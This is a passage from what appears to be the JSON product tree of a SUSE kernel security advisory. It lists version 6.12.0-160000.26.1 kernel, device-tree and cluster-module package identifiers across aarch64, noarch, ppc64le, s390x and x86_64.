"product_id": "dlm-kmp-azure-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"product_id": "dlm-kmp-default-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"product_id": "dlm-kmp-rt-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-allwinner-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-allwinner-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-allwinner-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-altera-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-altera-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-altera-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-amazon-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-amazon-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-amazon-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-amd-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-amd-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-amd-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-amlogic-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-amlogic-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-amlogic-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-apm-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-apm-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-apm-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-apple-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-apple-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-apple-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-arm-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-arm-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-arm-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-broadcom-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-broadcom-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-broadcom-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-cavium-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-cavium-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-cavium-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-exynos-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-exynos-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-exynos-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-freescale-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-freescale-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-freescale-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-hisilicon-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-lg-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-lg-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-lg-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-marvell-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-marvell-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-marvell-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-mediatek-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-mediatek-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-mediatek-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-nvidia-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-nvidia-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-nvidia-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-qcom-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-qcom-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-qcom-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-renesas-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-renesas-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-renesas-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-rockchip-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-rockchip-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-rockchip-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-socionext-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-socionext-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-socionext-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-sprd-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-sprd-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-sprd-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-xilinx-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dtb-xilinx-6.12.0-160000.26.1.aarch64",
"product_id": "dtb-xilinx-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"product": {
"name": "gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"product_id": "gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"product": {
"name": "gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"product_id": "gfs2-kmp-azure-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"product": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"product_id": "gfs2-kmp-default-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"product": {
"name": "gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"product_id": "gfs2-kmp-rt-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-64kb-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-64kb-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-64kb-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-64kb-extra-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-64kb-optional-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-azure-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-azure-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-azure-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-azure-devel-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-azure-extra-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-azure-optional-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-default-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-default-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"product": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"product_id": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-default-devel-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-default-devel-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-default-extra-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-default-extra-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-optional-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-default-optional-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-default-optional-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-kvmsmall-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-obs-build-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-obs-build-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-obs-build-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-obs-qa-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-rt-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-rt-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-rt-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-rt-devel-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-rt-extra-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-rt-optional-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-syms-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-syms-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-syms-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"product_id": "kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"product_id": "kselftests-kmp-azure-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"product_id": "kselftests-kmp-default-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"product_id": "kselftests-kmp-rt-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"product": {
"name": "ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"product_id": "ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"product": {
"name": "ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"product_id": "ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"product": {
"name": "ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"product_id": "ocfs2-kmp-default-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"product": {
"name": "ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"product_id": "ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-devel-6.12.0-160000.26.1.noarch",
"product": {
"name": "kernel-devel-6.12.0-160000.26.1.noarch",
"product_id": "kernel-devel-6.12.0-160000.26.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-docs-6.12.0-160000.26.1.noarch",
"product": {
"name": "kernel-docs-6.12.0-160000.26.1.noarch",
"product_id": "kernel-docs-6.12.0-160000.26.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-docs-html-6.12.0-160000.26.1.noarch",
"product": {
"name": "kernel-docs-html-6.12.0-160000.26.1.noarch",
"product_id": "kernel-docs-html-6.12.0-160000.26.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-macros-6.12.0-160000.26.1.noarch",
"product": {
"name": "kernel-macros-6.12.0-160000.26.1.noarch",
"product_id": "kernel-macros-6.12.0-160000.26.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-source-6.12.0-160000.26.1.noarch",
"product": {
"name": "kernel-source-6.12.0-160000.26.1.noarch",
"product_id": "kernel-source-6.12.0-160000.26.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"product": {
"name": "kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"product_id": "kernel-source-vanilla-6.12.0-160000.26.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"product_id": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"product_id": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"product_id": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-default-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-default-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"product": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"product_id": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-default-devel-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-default-extra-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-default-optional-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-kvmsmall-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-obs-build-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-obs-qa-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-syms-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-syms-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-syms-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"product_id": "kselftests-kmp-default-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"product_id": "ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"product": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"product_id": "cluster-md-kmp-default-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "dlm-kmp-default-6.12.0-160000.26.1.s390x",
"product": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.s390x",
"product_id": "dlm-kmp-default-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"product": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"product_id": "gfs2-kmp-default-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-default-6.12.0-160000.26.1.s390x",
"product_id": "kernel-default-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-default-devel-6.12.0-160000.26.1.s390x",
"product_id": "kernel-default-devel-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-default-extra-6.12.0-160000.26.1.s390x",
"product_id": "kernel-default-extra-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-optional-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-default-optional-6.12.0-160000.26.1.s390x",
"product_id": "kernel-default-optional-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-obs-build-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-obs-build-6.12.0-160000.26.1.s390x",
"product_id": "kernel-obs-build-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-obs-qa-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.s390x",
"product_id": "kernel-obs-qa-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-syms-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-syms-6.12.0-160000.26.1.s390x",
"product_id": "kernel-syms-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"product_id": "kernel-zfcpdump-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"product": {
"name": "kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"product_id": "kselftests-kmp-default-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"product": {
"name": "ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"product_id": "ocfs2-kmp-default-6.12.0-160000.26.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"product": {
"name": "cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"product_id": "cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"product": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"product_id": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"product": {
"name": "cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"product_id": "cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"product": {
"name": "dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"product_id": "dlm-kmp-azure-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"product": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"product_id": "dlm-kmp-default-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"product": {
"name": "dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"product_id": "dlm-kmp-rt-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"product": {
"name": "gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"product_id": "gfs2-kmp-azure-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"product": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"product_id": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"product": {
"name": "gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"product_id": "gfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-azure-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-azure-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-azure-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-azure-devel-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-azure-extra-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-azure-optional-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-azure-vdso-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-default-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-default-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"product": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"product_id": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-default-devel-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-default-devel-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-default-extra-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-default-extra-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-optional-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-default-optional-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-default-optional-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-default-vdso-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-kvmsmall-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-obs-build-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-obs-build-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-obs-build-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-obs-qa-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-rt-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-rt-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-rt-devel-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-rt-extra-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-rt-optional-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-rt-vdso-6.12.0-160000.26.1.x86_64"
}
},
{
